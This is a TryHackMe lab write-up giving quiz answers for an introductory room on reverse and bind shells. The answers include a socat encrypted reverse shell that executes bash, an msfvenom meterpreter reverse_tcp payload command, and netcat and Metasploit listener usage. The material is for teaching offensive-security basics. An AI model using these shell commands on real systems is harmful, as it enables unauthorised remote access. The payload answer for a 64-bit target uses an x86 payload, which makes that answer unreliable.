
What the Shell? - TryHackMe Write-up


Info

  • Name: What the Shell?
  • Description: An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.
  • Difficulty: Easy
  • Room link: https://tryhackme.com/room/introtoshells

Write-up

Task 3

Q: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

A: R

Q: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

A: N

Q: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

A: T

Task 4

Q: Which option tells netcat to listen?

A: -l

Q: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

A: nc 10.10.10.11 8080

Task 5

Q: How would you change your terminal size to have 238 columns?

A: stty cols 238

Q: What is the syntax for setting up a Python3 webserver on port 80?

A: sudo python3 -m http.server 80

Task 6

Q: How would we get socat to listen on TCP port 8080?

A: TCP-L:8080

Task 7

Q: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem".

A: socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

Q: If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

A: socat OPENSSL:10.10.10.5:53 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Task 8

Q: What command can be used to create a named pipe in Linux?

A: mkfifo

Task 9

Q: Which symbol is used to show that a shell is stageless?

A: _

Q: What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell.

A: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o shell.elf LHOST=10.10.10.5 LPORT=443

Task 10

Q: What command can be used to start a listener in the background?

A: exploit -j

Q: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

A: sessions 10
